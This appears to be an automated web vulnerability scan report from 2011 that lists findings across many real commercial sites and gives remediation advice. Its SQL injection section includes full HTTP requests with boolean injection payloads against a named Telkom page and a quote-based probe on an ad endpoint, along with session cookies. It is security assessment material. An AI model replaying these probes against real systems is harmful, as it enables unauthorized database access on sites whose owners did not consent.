18.8. http://d1.openx.org/afr.php

18.9. http://eastore.ea.com/integration/job/request/ShoppingCartService/ea/site/

18.10. http://eastore.ea.com/integration/job/request/ShoppingCartService/ea/site/

18.11. http://eastore.ea.com/integration/job/request/ShoppingCartService/ea/site/

18.12. http://fls.doubleclick.net/activityi

18.13. http://fls.doubleclick.net/activityi

18.14. http://fls.doubleclick.net/activityi

18.15. http://gan.doubleclick.net/gan_impression

18.16. http://googleads.g.doubleclick.net/pagead/ads

18.17. http://googleads.g.doubleclick.net/pagead/ads

18.18. http://googleads.g.doubleclick.net/pagead/ads

18.19. http://googleads.g.doubleclick.net/pagead/ads

18.20. http://googleads.g.doubleclick.net/pagead/ads

18.21. http://googleads.g.doubleclick.net/pagead/ads

18.22. http://googleads.g.doubleclick.net/pagead/ads

18.23. http://googleads.g.doubleclick.net/pagead/ads

18.24. http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849

18.25. http://mediacdn.disqus.com/1308858010/build/system/disqus.js

18.26. http://mg.dt00.net/js/g/a/gamersdailynews.com.2930.js

18.27. http://store.origin.com/DRHM/store

18.28. http://store.origin.com/store

18.29. http://store.origin.com/store

18.30. http://videogamevoters.org/eacorp/

18.31. http://web-static.ea.com/atlas/sw-combine/1308169381/aa9b219f67624074aa6ae611eb06bda0.js

18.32. http://web.sa.mapquest.com/mobil1/

18.33. http://www.asiawebdirect.com/forms/portal-feedback.html

18.34. http://www.celebritycruises.com/specials/viewHTMLPromo.do

18.35. https://www.ea.com/profile/js/facebook.jsx

18.36. https://www.ea.com/profile/js/jquery_facebox.jsx

18.37. https://www.ea.com/profile/register

18.38. http://www.facebook.com/plugins/like.php

18.39. http://www.facebook.com/plugins/like.php

18.40. http://www.facebook.com/plugins/likebox.php

18.41. http://www.facebook.com/plugins/likebox.php

18.42. http://www.google.com/search

18.43. http://www.google.com/search

18.44. http://www.google.com/url

18.45. http://www.google.com/url

18.46. http://www.google.com/url

18.47. http://www.google.com/url

18.48. http://www.google.com/url

18.49. http://www.info.ea.com/

18.50. http://www.metlife.com/about/index.html

18.51. http://www.metlife.com/individual/employee-benefits/index.html

18.52. http://www.metlife.com/individual/insurance/disability-insurance/index.html

18.53. http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html

18.54. http://www.metlife.com/wps/MCTridionWSProxy/TridionMCService/PageContent/metlife/individual/index.html

18.55. http://www.onlinecomcast.com/

18.56. http://www.phuket-travel.com/nightlife/fantasea.htm

18.57. http://www.phuket.com/andamanwhitebeach/

18.58. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.59. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.60. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.61. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.62. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.63. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

18.64. http://www.silobreaker.com/ShowWidget.aspx

19. Cross-domain script include

19.1. http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/

19.2. http://beta.telkom.co.id/

19.3. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

19.4. http://beta.telkom.co.id/info-perusahaan/

19.5. http://beta.telkom.co.id/pojok-media/artikel-infokom/

19.6. http://beta.telkom.co.id/pojok-media/berita-telkom/

19.7. http://beta.telkom.co.id/pojok-media/siaran-pers/

19.8. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

19.9. http://beta.telkom.co.id/products-services/index.html

19.10. http://beta.telkom.co.id/produk-layanan/

19.11. http://clicktoverify.truste.com/pvr.php

19.12. http://download1.parallels.com/favicon.ico

19.13. http://everquest2.com/free_to_play

19.14. http://fls.doubleclick.net/activityi

19.15. http://googleads.g.doubleclick.net/pagead/ads

19.16. http://googleads.g.doubleclick.net/pagead/ads

19.17. http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849

19.18. http://listings.mapquest.com/apps/listing

19.19. http://newerforms.wn.com/form/ad_enquiry/

19.20. http://newerforms.wn.com/form/sitemap_feedback/

19.21. http://phuket.com/

19.22. http://r1-ads.ace.advertising.com/site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html

19.23. http://store.origin.com/

19.24. http://store.origin.com/DRHM/store

19.25. http://store.origin.com/store

19.26. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800

19.27. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800

19.28. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000

19.29. http://store.origin.com/store/ea/home/

19.30. http://videogamevoters.org/eacorp/

19.31. http://videogamevoters.org/index.php/modal/sc-soon

19.32. http://videogamevoters.org/page/s/raiseyourvoice

19.33. http://web.sa.mapquest.com/mobil1/

19.34. http://www.asiawebdirect.com/forms/portal-feedback.html

19.35. http://www.citibank.com/favicon.ico

19.36. http://www.ea.com/

19.37. http://www.ea.com/1/product-eulas

19.38. https://www.ea.com/profile/register

19.39. http://www.facebook.com/login.php

19.40. http://www.facebook.com/plugins/like.php

19.41. http://www.facebook.com/plugins/like.php

19.42. http://www.facebook.com/plugins/likebox.php

19.43. http://www.metlife.com/about/index.html

19.44. http://www.metlife.com/individual/employee-benefits/index.html

19.45. http://www.metlife.com/individual/insurance/disability-insurance/index.html

19.46. http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html

19.47. http://www.onlinecomcast.com/

19.48. http://www.phuket-travel.com/

19.49. http://www.phuket-travel.com/nightlife/fantasea.htm

19.50. http://www.phuket-travel.com/premium-packages/index.htm

19.51. http://www.phuket.com/andamanwhitebeach/

19.52. http://www.phuket.com/islands/index.htm

19.53. http://www.silobreaker.com/ShowWidget.aspx

19.54. http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174

19.55. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html

19.56. http://www.telkomsel.com/product/blackberry/undefined

20. File upload functionality

20.1. http://mediacdn.disqus.com/1308858010/build/system/upload.html

20.2. http://videogamevoters.org/page/s/raiseyourvoice

21. TRACE method is enabled

21.1. http://beta.telkom.co.id/

21.2. http://d1.openx.org/

21.3. http://sales.swsoft.com/

21.4. https://shop.marketplace.parallels.com/

21.5. https://softlayer.parallelsmarketplace.com/

21.6. http://www.addthis.com/

21.7. http://www.parallels.com/

22. Email addresses disclosed

22.1. http://beta.telkom.co.id/info-perusahaan/

22.2. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

22.3. http://beta.telkom.co.id/products-services/index.html

22.4. http://beta.telkom.co.id/produk-layanan/

22.5. http://beta.telkom.co.id/theme/Standard/js/curvycorners.src.js

22.6. http://cdn.wn.com/or/js/jquery.hoverIntent.minified.js

22.7. http://clicktoverify.truste.com/common/css/validate2_1_big.css

22.8. http://clicktoverify.truste.com/css/styles.css

22.9. http://everquest2.com/_themes/global/javascript/validation/jquery_validationEngine.js

22.10. http://everquest2.com/javascript/s_code.js

22.11. http://hotels.asiawebdirect.com/scripts/s_code.js

22.12. http://legal.ea.com/legal/legal.jsp

22.13. http://mediacdn.disqus.com/1308858010/build/system/disqus.js

22.14. http://newerforms.wn.com/media/js/date.js

22.15. http://newsletter.asiawebdirect.com/inxmail3/subscribe.jsp

22.16. https://softlayer.parallelsmarketplace.com/store/conf/86/lang/en.js

22.17. https://softlayer.parallelsmarketplace.com/store/index.php

22.18. http://static.asiawebdirect.com/premium/js/s_code.js

22.19. http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/

22.20. http://twitter.com/account/bootstrap_data

22.21. http://videogamevoters.org/page/-/js/vgvn-source.js

22.22. https://www.ea.com/profile/js/jquery_facebox.jsx

22.23. http://www.epm.com.co/epm/web/_admincom/admincom_pye_bienvenida.html

22.24. http://www.epm.com.co/epm/web/_admincom/banner19.html

22.25. http://www.epm.com.co/epm/web/_assets/code/mainComponentController.js

22.26. http://www.epm.com.co/epm/web/_assets/code/mtc_rev1.js

22.27. http://www.epm.com.co/epm/web/_assets/code/multicolumna.js

22.28. http://www.epm.com.co/epm/web/_assets/code/noticiasgrupo.js

22.29. http://www.epm.com.co/epm/web/_assets/code/variables_generales.cfg.js

22.30. http://www.fuelprogress.com/USA-English/GFM/Microsite/seo/js/jquery.pngFix.pack.fixed.js

22.31. http://www.gamersdailynews.com/js/lightbox.js

22.32. http://www.gamersdailynews.com/js/prototype.js

22.33. http://www.metlife.com/individual/insurance/disability-insurance/index.html

22.34. http://www.metlife.com/individual/insurance/life-insurance/hp-life-insurance-quote.html

22.35. http://www.metlife.com/wps/MCTridionWSProxy/TridionMCService/PageContent/metlife/individual/index.html

22.36. http://www.phuket-travel.com/premium-packages/index.htm

22.37. http://www.phuket-travel.com/scripts/s_code.js

22.38. http://www.pogo.com/v/FSMQBg/include/js/shared/markup2.js

22.39. http://www.pymnts.com/mysite/javascript/main.js

22.40. http://www.pymnts.com/sapphire/thirdparty/prototype/prototype.js

22.41. http://www.telkomsel.com/media/facebox/facebox.js

22.42. http://www.xobni.com/javascripts/jquery.base64.min.js

23. Private IP addresses disclosed

23.1. http://api.facebook.com/restserver.php

23.2. http://api.facebook.com/restserver.php

23.3. http://connect.facebook.net/en_GB/all.js

23.4. http://connect.facebook.net/en_US/all.js

23.5. http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/63583.htm

23.6. http://static.ak.fbcdn.net/connect.php/css/share-button-css

23.7. http://static.ak.fbcdn.net/connect.php/js/FB.Share

23.8. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.9. http://static.ak.fbcdn.net/images/connect_sprite.png

23.10. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/ulcvK428paE.js

23.11. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/OqB3HmdoAE3.css

23.12. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

23.13. http://web-static.ea.com/us/portal/js/ea/Framework.js

23.14. http://www.facebook.com/extern/login_status.php

23.15. http://www.facebook.com/extern/login_status.php

23.16. http://www.facebook.com/extern/login_status.php

23.17. http://www.facebook.com/extern/login_status.php

23.18. http://www.facebook.com/extern/login_status.php

23.19. http://www.facebook.com/login.php

23.20. http://www.facebook.com/plugins/like.php

23.21. http://www.facebook.com/plugins/like.php

23.22. http://www.facebook.com/plugins/like.php

23.23. http://www.facebook.com/plugins/like.php

23.24. http://www.facebook.com/plugins/like.php

23.25. http://www.facebook.com/plugins/like.php

23.26. http://www.facebook.com/plugins/like.php

23.27. http://www.facebook.com/plugins/like.php

23.28. http://www.facebook.com/plugins/like.php

23.29. http://www.facebook.com/plugins/likebox.php

23.30. http://www.facebook.com/plugins/likebox.php

23.31. http://www.facebook.com/sharer/sharer.php

23.32. http://www.google.com/sdch/vD843DpA.dct

23.33. http://www.metlife.com/system/css/components_home.css

23.34. http://www.metlife.com/system/css/global.css

23.35. http://www.metlife.com/system/js/vendor/optimost.js

24. Credit card numbers disclosed

24.1. https://softlayer.parallelsmarketplace.com/store/conf/86/lang/en.js

24.2. https://softlayer.parallelsmarketplace.com/store/index.php

25. Robots.txt file

25.1. http://609167.r.msn.com/

25.2. http://a.netmng.com/

25.3. http://ad.doubleclick.net/click

25.4. http://ad.yieldmanager.com/pixel

25.5. http://adclick.g.doubleclick.net/aclk

25.6. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

25.7. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html

25.8. http://d1.openx.org/afr.php

25.9. http://display.digitalriver.com/

25.10. http://fls.doubleclick.net/activityi

25.11. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1034849195/

25.12. http://l.addthiscdn.com/live/t00/250lo.gif

25.13. http://rcci.122.2o7.net/b/ss/celebritycruiseprod/1/H.22.1/s6910370561759

25.14. http://s7.addthis.com/js/250/addthis_widget.js

25.15. http://segment-pixel.invitemedia.com/pixel

25.16. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.17. http://swsoft.122.2o7.net/b/ss/swsdev/1/H.21/s08157070665620

25.18. http://tracking.searchmarketing.com/welcome.asp

25.19. http://wotifcom.112.2o7.net/b/ss/wotifcom-awd-global-prd,wotifcom-awd-phuket-prd/1/H.17/s69540000788401

25.20. http://www.addthis.com/bookmark.php

25.21. http://www.celebritycruises.com/iw-cc/base/styles/iw.css

25.22. http://www.epm.com.co/

25.23. http://www.facebook.com/sharer/sharer.php

25.24. http://www.google-analytics.com/siteopt.js

25.25. http://www.googleadservices.com/pagead/conversion/1034849195/

25.26. http://www.parallels.com/en/store/plesk/win/addons/

26. Cacheable HTTPS response

26.1. https://customersupport.ea.com/loginapp/cp/login.do

26.2. https://shop.marketplace.parallels.com/http/blank.html

26.3. https://softlayer.parallelsmarketplace.com/store/design/images/favicon.ico

26.4. https://store.playstation.com/favicon.ico

26.5. https://www.ea.com/profile/register

27. Multiple content types specified

27.1. http://exxon.com/Images/lightview/close_large.png

27.2. http://exxon.com/Images/lightview/close_small.png

27.3. http://exxon.com/Images/lightview/controller_prev.png

27.4. http://exxon.com/Images/lightview/controller_slideshow_stop.png

27.5. http://exxon.com/Images/lightview/inner_next.png

27.6. http://exxon.com/Images/lightview/inner_prev.png

27.7. http://exxon.com/Images/lightview/inner_slideshow_stop.png

27.8. http://exxon.com/Images/lightview/loading.gif

27.9. http://exxon.com/Images/lightview/prev.png

27.10. http://exxon.com/Images/lightview/topclose.png

27.11. http://exxon.com/favicon.ico

27.12. http://www.fuelprogress.com/favicon.ico

28. HTML does not specify charset

28.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

28.2. http://ads.pointroll.com/PortalServe/

28.3. http://beta.telkom.co.id/op.php

28.4. http://cdn.at.atwola.com/_media/uac/tcodeqt.html

28.5. http://content.pulse360.com/43AE06D6-306A-11E0-9FBF-51F23F5BF877

28.6. http://content.pulse360.com/F81E71FC-348C-11E0-8455-C9C5E4064C68

28.7. http://display.digitalriver.com/

28.8. http://ds.addthis.com/red/psi/sites/beta.telkom.co.id/p.json

28.9. http://fls.doubleclick.net/activityi

28.10. http://mediacdn.disqus.com/1308858010/build/system/def.html

28.11. http://mediacdn.disqus.com/1308858010/build/system/reply.html

28.12. http://mediacdn.disqus.com/1308858010/build/system/upload.html

28.13. https://softlayer.parallelsmarketplace.com/design/css/spin.css

28.14. http://web.sa.mapquest.com/Images/spacer.gif

28.15. http://web.sa.mapquest.com/favicon.ico

28.16. http://www.asiawebdirect.com/forms/portal-feedback.html

28.17. http://www.citibank.com/favicon.ico

28.18. http://www.epm.com.co/epm/web/_admincom/diccionario/_admincom_dict_lista.html

28.19. http://www.epm.com.co/epm/web/_admincom/menuinstitucional2.html

28.20. http://www.epm.com.co/epm/web/_assets/code/redes_sociales.cfg.html

28.21. http://www.exxonmobilstations.com/favicon.ico

28.22. http://www.mapquest.com/cdn/_uac/adpage.htm

28.23. http://www.metlife.com/assets/cao/iws/hp/ind/hero/metricsblank.gif

28.24. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCHealthClassOption

28.25. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCPremiumQuote

28.26. http://www.phuket-travel.com/checkavailability/currency.php

28.27. http://www.phuket-travel.com/reserve/indexShort.php

28.28. http://www.phuket-travel.com/scripts/scripts.htm

29. Content type incorrectly stated

29.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

29.2. http://a.netmng.com/

29.3. http://a3.twimg.com/profile_images/58727890/PIA08370_normal.png

29.4. http://api.twitter.com/1/urls/resolve.json

29.5. http://ar.voicefive.com/b/rc.pli

29.6. http://cdn.wn.com/or/images/icons/edit24x24.png

29.7. http://cdn.wn.com/or/js/hyphenator_en-2.5.0.min.js

29.8. http://content.pulse360.com/43AE06D6-306A-11E0-9FBF-51F23F5BF877

29.9. http://content.pulse360.com/F81E71FC-348C-11E0-8455-C9C5E4064C68

29.10. http://display.digitalriver.com/

29.11. http://drh.img.digitalriver.com/DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico

29.12. http://drh2.img.digitalriver.com/favicon.ico

29.13. http://drh2.img.digitalriver.com/store

29.14. http://everquest2.com/favicon.ico

29.15. http://images.apple.com/global/nav/scripts/globalnav.js

29.16. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

29.17. http://media.celebritycruises.com/celebrity/content/en_US/images/specials/special_promotions/ports_header.jpg

29.18. https://softlayer.parallelsmarketplace.com/store/design/images/favicon.ico

29.19. https://softlayer.parallelsmarketplace.com/store/index.php

29.20. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

29.21. http://static.asiawebdirect.com/m/phuket/portals/phuket-com/homepage/islands/allParagraphs/0117/image/222

29.22. http://store.origin.com/DRHM/Storefront/Site/ea/pb/images/EA_favicon.ico

29.23. http://store.origin.com/store

29.24. https://store.playstation.com/favicon.ico

29.25. http://support.ea.com/ci/ajaxCustom/getHierValues/session/L3RpbWUvMTMwODkyMzAzMS9zaWQvOVpUQ2xqeGs%3D

29.26. http://support.ea.com/ci/browserSearch/desc/http%3A%2F%2Fsupport.ea.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/%2Feuf%2Fassets%2Fimages%2Ficons%2Ffavicon_browserSearchPlugin.ico

29.27. http://support.ea.com/euf/rightnow/optimized/1308735671/themes/ea_com/images/ico_support_home.png

29.28. http://twitter.com/favorites/xobni.json

29.29. http://v360.mqcdn.com/sv/ac/coverages.mercator.jsonp

29.30. http://v360.mqcdn.com/sv/ac/styling.mercator.jsonp

29.31. http://videogamevoters.org/ext/jquery/jquery-bsdNoConflict.js

29.32. http://videogamevoters.org/page/-/js/sys_regular.js

29.33. http://videogamevoters.org/page/spud

29.34. http://videogamevoters.org/utils/locale/load_locale.ajax.php

29.35. http://web-static.ea.com/us/portal/images/icon_downloads.png

29.36. http://web-static.ea.com/us/portal/images/icon_music.png

29.37. http://web-static.ea.com/us/portal/images/icon_photo.png

29.38. http://web-static.ea.com/us/portal/images/icon_video.png

29.39. http://www.asiawebdirect.com/customer/enquiry/template/en/lang_txt.js

29.40. http://www.ea.com/json/user-menu

29.41. http://www.epm.com.co/epm/web/_admincom/diccionario/_admincom_dict_lista.html

29.42. http://www.epm.com.co/epm/web/_admincom/menuinstitucional2.html

29.43. http://www.epm.com.co/epm/web/_assets/code/multihistorias.js

29.44. http://www.epm.com.co/epm/web/_assets/code/redes_sociales.cfg.html

29.45. http://www.facebook.com/extern/login_status.php

29.46. http://www.gamersdailynews.com/images/nextgen_green/header_split.jpg

29.47. http://www.gamersdailynews.com/images/nextgen_green/rate.jpg

29.48. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

29.49. http://www.metlife.com/assets/campaigns/search/termlife/hp/form-tile.png

29.50. http://www.metlife.com/assets/ib/insurance/disability/individual-disability-calc.jpg

29.51. http://www.metlife.com/assets/ib/insurance/disability/quiz-banner.jpg

29.52. http://www.metlife.com/system/assets/favicon.ico

29.53. http://www.metlife.com/system/css/RRvalidation.gif

29.54. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCHealthClassOption

29.55. http://www.metlife.com/wps/proxy/MCPremiumQuoteWS/MCPremiumQuote

29.56. http://www.parallels.com/r/css/import.css

29.57. http://www.phuket-travel.com/reserve/indexShort.php

29.58. http://www.phuket-travel.com/scripts/scripts.htm

29.59. http://www.pogo.com/include/css/pogo.css

29.60. http://www.pymnts.com/favicon.ico

29.61. http://www.xobni.com/media/fonts/Chunkfive-webfont.woff

30. Content type is not specified

30.1. http://listings.mapquest.com/apps/images/favicon_mq.ico

30.2. http://www.pogo.com/favicon.ico

31. SSL certificate

31.1. https://shop.marketplace.parallels.com/

31.2. https://softlayer.parallelsmarketplace.com/


1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://beta.telkom.co.id/op.php [icid parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://beta.telkom.co.id
Path:   /op.php

Issue detail

The icid parameter appears to be vulnerable to SQL injection attacks. The payloads 15615320%20or%201%3d1--%20 and 15615320%20or%201%3d2--%20 were each submitted in the icid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /op.php?icid=3715615320%20or%201%3d1--%20 HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.3.10.1308921355

Response 1

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:17:49 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
       <html>
       <head>
        <meta http-equiv="content-type" content="text/html; charset=windows-1250">
        <link href="wdefault.css" rel="s
...[SNIP]...
<body>

<p class="texttitle01"><strong><font color="#00ccff">DESKRIPSI</font></strong> </p>
<p><span class="copy01">Merupakan layanan komunikasi jarak jauh antar pelanggan yang masih dalam satu wilayah negara. Pada umumnya, pelanggan-pelanggan tersebut berada dalam wilayah kode area yang berbeda.</span></p>
<p class="texttitle01"><strong><font color="#00ccff"></font></strong></p>
<p class="texttitle01"><strong><font color="#00ccff">FITUR &amp; TARIF</font></strong>&nbsp;&nbsp;&nbsp;</p>
<p><strong>Tabel Tarif Percakapan (berlaku sejak&nbsp;8 April 2008, pukul 00.00 waktu setempat) </strong></p>
<p><strong>Tarif Dasar SLJJ PSTN ke Mobile/Seluler</strong></p>
<table cellpadding="0" style="WIDTH: 536px; HEIGHT: 914px">
<tbody>
<tr class="textmenu01" style="COLOR: rgb(51,102,153)">
<td width="631" colspan="6">
<p align="center"><strong>Hari Senin s.d Sabtu </strong></p>
</td>
</tr>
<tr bgcolor="#52b3e5" class="textmenu01">
<td width="118">
<p align="center"><span class="texttitle02"><strong>Jarak (Km) </strong></span></p>
</td>
<td width="153">
<p align="center"><span class="texttitle02"><strong>Time Band </strong></span></p>
</td>
<td width="88">
<p align="center"><span class="texttitle02"><strong>Lama </strong></span></p>
</td>
<td width="94">
<p align="center"><span class="texttitle02"><strong>Baru </strong></span></p>
</td>
</tr>
<tr bgcolor="#52b3e5" class="textmenu01">
<td>&nbsp;</td>
<td>&nbsp;</td>
<td width="88">
<p align="center"><span class="texttitle02">(Rp.)/20 dtk&nbsp;</span></p>
</td>
<td width="94">
<p align="center"><span class="texttitle02">(Rp.)/20 dtk</span></p>
</td>
</tr>
<tr bgcolor="#d8e
...[SNIP]...

Request 2

GET /op.php?icid=3715615320%20or%201%3d2--%20 HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.3.10.1308921355

Response 2

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:17:51 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 435
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
       <html>
       <head>
        <meta http-equiv="content-type" content="text/html; charset=windows-1250">
        <link href="wdefault.css" rel="s
...[SNIP]...
<body>

       </BODY>
       </HTML>
1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The bpp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bpp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=5812067516&w=160&lmt=1265919214&flash=10.3.181&url=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&dt=1308921644698&bpp=3'&shv=r20110615&jsv=r20110616&correlator=1308921644759&frm=4&adk=1526460535&ga_vid=1300501793.1308921638&ga_sid=1308921638&ga_hid=303218268&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fphuket.com%2F&fu=0&ifi=1&dtd=74&xpc=9Mga7JBlkD&p=http%3A//www.phuket.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:29:26 GMT
Server: cafe
Cache-Control: private
Content-Length: 9000
X-XSS-Protection: 1; mode=block

